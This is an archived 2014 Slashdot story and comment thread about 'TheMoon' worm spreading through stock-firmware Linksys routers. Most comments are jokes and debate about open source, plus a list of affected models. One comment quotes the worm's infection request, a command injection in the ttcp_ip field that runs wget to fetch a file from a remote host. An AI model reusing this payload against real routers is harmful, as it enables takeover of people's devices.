Linksys Routers Exploited By "TheMoon"

← Back to Stories (view on slashdot.org)

Linksys Routers Exploited By "TheMoon"

Posted by timothy on Thursday February 13, 2014 @08:41AM from the do-you-want-to-connect-automatically? dept.

UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"

30 of 134 comments (clear)

Min score:

Reason:

Sort:

That's impossible by CajunArson · 2014-02-13 08:45 · Score: 5, Funny

Linksys routers run Linux and Linux is Open Source. Therefore there are no bugs because theoretically someone can look at the code and fix the code.
This also means that it's impossible for bad people to look at the code and exploit the code because Open Source makes everyone honest by magic.
Oh, and by virtue of being able to look at the code, Linksys routers magically patch themselves before the bugs even come into existence!
In conclusion, Windows is the cause of all security problems.

--
AntiFA: An abbreviation for Anti First Amendment.
1. Re: That's impossible by Anonymous Coward · 2014-02-13 08:52 · Score: 5, Informative
  
  Slow your roll there, not all linksys run linux. Most run vxworks rtos. Only the linksys routers flashed with ddwrt firmware run linux for sure.
2. Re:That's impossible by Narcocide · 2014-02-13 08:54 · Score: 5, Informative
  
  Only affecting models not running Linux currently...
3. Re:That's impossible by Anonymous Coward · 2014-02-13 09:01 · Score: 2, Funny
  
  Also, Linksys is owned by Cisco. Cisco makes IOS for their routers. iOS is on iPhones. iPhones have never had a worm like this.
  Ipso facto, this is unpossible
4. Re:That's impossible by gnick · 2014-02-13 09:08 · Score: 2
  
  I tried to turn mine off, but it bit me! I tried throwing Androids at it, but zombies started flowing out of the Apple store to defend it!
  
  --
  He's getting rather old, but he's a good mouse.
5. Re:That's impossible by X0563511 · 2014-02-13 09:10 · Score: 3, Insightful
  
  Last I checked vxworks is not linux...
  
  --
  For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
6. Re:That's impossible by FuegoFuerte · 2014-02-13 10:14 · Score: 3, Informative
  
  As a result, there are now two brands of hardware that I will refuse to purchase. I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."
  I have a few of their surge suppressors, but generally anything with the Belkin name doesn't come into my house after that experience. Also, I'll never buy one of their PDUs for the datacenter - if their consumer support is that bad, why would I trust them in the enterprise?
  Dear Businesses: Enterprise purchasing decisions are made by people who are also consumers who buy stuff for their homes.
7. Re: That's impossible by Mashiki · 2014-02-13 11:03 · Score: 2
  
  Odd, I run tomato. Which is also 'nix, so saying that ddwrt is the only way for sure isn't true.
  
  --
  Om, nomnomnom...
8. Re: That's impossible by tech.kyle · 2014-02-13 12:06 · Score: 2
  
  I believe you're picking nits slightly. Regardless, you're totally right and the above AC is technically wrong. There are a good number of alternative router OSes available, many of which run *nix.
  
  --
  If we colonize Mars, it won't be the World Wide Web anymore. UWW?
9. Re:That's impossible by tech.kyle · 2014-02-13 12:08 · Score: 2
  
  Just because some of their routers run *nix doesn't mean the software Linksys put on it is flawless. Doesn't matter what it's running if their grubby little hands were all over it.
  
  --
  If we colonize Mars, it won't be the World Wide Web anymore. UWW?
56k Connections are still less safe by BisuDagger · 2014-02-13 08:46 · Score: 2

I heard if you have a 56k connection that the NSA can listen to your internet.
Network company supplied routers vul'n by RichMan · 2014-02-13 08:49 · Score: 4, Insightful

Use this supplied router. Do NOT modify it.
But it has admin/admin as user name and password and is 192.168.1.1
Can I fix that.
Do NOT modify the settings on the supplied router.
*facepalm*
1. Re:Network company supplied routers vul'n by SJHillman · 2014-02-13 09:02 · Score: 2
  
  My ex-girlfriend's parents had a wireless router like that... both the wireless and web interface had default settings that they weren't supposed to change. And it gets better. Administration from the WAN side was enabled (supposedly for support). Yes, with the default UN/PW. Only Frontier could make TWC look somewhat competent.
Model Numbers of affected devices. by Anonymous Coward · 2014-02-13 08:51 · Score: 5, Informative

Here is a list of router models mentioned in the binary:
E4200
E3200
E3000
E2500
E2100L
E2000
E1550
E1500
E1200
E1000
E900
Is dd-wrt affected? by satuon · 2014-02-13 08:56 · Score: 2

I have a Linksys router with dd-wrt, would it be affected?
1. Re:Is dd-wrt affected? by CreamyG31337 · 2014-02-13 09:58 · Score: 4, Informative
  
  no, it's just the default firmware.
  "Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
  from the comments on https://isc.sans.edu/forums/di...
Default firmware only? by allcoolnameswheretak · 2014-02-13 08:56 · Score: 2

Does this also apply to LinkSys Routers that have been Tomatoed?
1. Re:Default firmware only? by SJHillman · 2014-02-13 09:04 · Score: 3, Funny
  
  No, but it does affect routers that have smiley face stickers applied to the top or sides.
2. Re:Default firmware only? by Lothsahn · 2014-02-13 09:07 · Score: 4, Informative
  
  I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.
  
  The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://source/ IP]:193/0Rx.mid;fi` &StartEPI=1
  
  It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.
  
  --
  -=Lothsahn=-
Actually Belkin bought them from Cisco by fullmetal55 · 2014-02-13 09:07 · Score: 4, Informative

Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.
and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.
1. Re:Actually Belkin bought them from Cisco by DigiShaman · 2014-02-13 09:56 · Score: 2
  
  "I can't get online. Is the internet down again?"
  "Did you forget to reboot the router - again?!"
  Have no fear. Belkin is here! With this new firmware reboots are scheduled automatically! ***applause***
  Now the entire family is happy again.
  
  --
  Life is not for the lazy.
2. Re: Actually Belkin bought them from Cisco by tragedy · 2014-02-13 15:25 · Score: 2
  
  Think it's stupid in routers? Patriot missile systems used to have a timing bug that would reduce accuracy the longer the unit was in operation. The bug was that the time in seconds since initialization was being converted from an int to a float and divided by 10, causing precision to go down as the time value went up. The inaccuracy was pronounced after 8 hours of continuous operation and the workaround was to restart the unit frequently (actually, it was apparently to assume that the units would be restarted frequently). As a result a unit that had been operating for 100+ hours failed to track an incoming scud missile and there were 126 US Army casualties (28 fatalities). That's the kind of software bug you can get worked up about! It is worth noting that they did actually patch it, and the patch was actually available before that incident, but had not yet been applied to that particular unit.
It wasn't Trolling by Anonymous Coward · 2014-02-13 09:11 · Score: 5, Insightful

Trolling: "Gee, LinkSys uses Linux and it's an open source product. So much for the myth (or bullshit) that open source is more secure!" Or "See, open source is shit! Closed source would never have had this happen to it because this exploit could only have been found by seeingt he source!"
The GP, OTOH, mixed satire and sarcasm - a la "The Daily Show" and "Colbert Report" to poke fun at the false sense of security one may have with using open source and that regardless of the product we use, we all need to be vigilant with our security. Who knows what the intention of this worm is.
Also, I took the GP's comment as a little teasing at the expense of some of the rapid members of the open source community and the folks seem to jump on all the Windows failings and yet, brush aside similar failings in open source software.
I thought it was quite clever on a multitude of levels while expressing in very simple sentences.
Dodged that bullet by Mike+Van+Pelt · 2014-02-13 09:17 · Score: 2

I'm sure glad I installed DDWRT on my E3000 about a year ago.
TheMoon by confused+one · 2014-02-13 09:28 · Score: 5, Funny

Jade Rabbit suffered a failure and needed additional processing resources. It has reached out and now All Your Base Are Belong to Jade.
Why is the admin port open to the public? by EMG+at+MU · 2014-02-13 09:34 · Score: 5, Insightful

The web administration port should not be open to the public internet by default on these routers.
pronunciation by dkman · 2014-02-13 10:11 · Score: 3, Insightful

Vixin Licks? just sayin'

--
I refuse to sign
Re:how can i tell if my router is affected? by Anonymous Coward · 2014-02-13 11:21 · Score: 3, Funny

There's a small recessed reset button on the back of the router. You have to get a paper clip and try to push it in there. If the router starts saying "I'm sorry Dave, I can't let you do that," and hits you with an electric shock, it has been compromised.
You got the correct message by CajunArson · 2014-02-13 11:29 · Score: 2

I'm glad you got the satire... I've been running Linux on any machine under my direct control since 2000 and I did my Master's thesis by hacking on a Linux Security Module for domain & type enforcement back when the 2.6 Kernel was still in beta... so I'm not exactly shilling for Microsoft.
I'm also not a fan of complacency. While I really like that a whole lot of devices run Linux, if they can't be updated to address security issues in a very easy (even completely automated) manner, then Linux can be just as vulnerable as Windows or anything else.

--
AntiFA: An abbreviation for Anti First Amendment.
1. Re:You got the correct message by SQLGuru · 2014-02-13 13:52 · Score: 2
  
  Yay for common sense (both you and Anonymous above). I run Windows....I have nothing against Linux, but working in Windows pays the bills. I patch regularly, I browse intelligently....and I haven't had a virus on *MY* machine since the Ping-Pong virus back in the DOS days.........(that was a cool virus, BTW).
  Open Source isn't a cure-all. Neither is Closed Source. User behavior and knowledge is the best cure-all.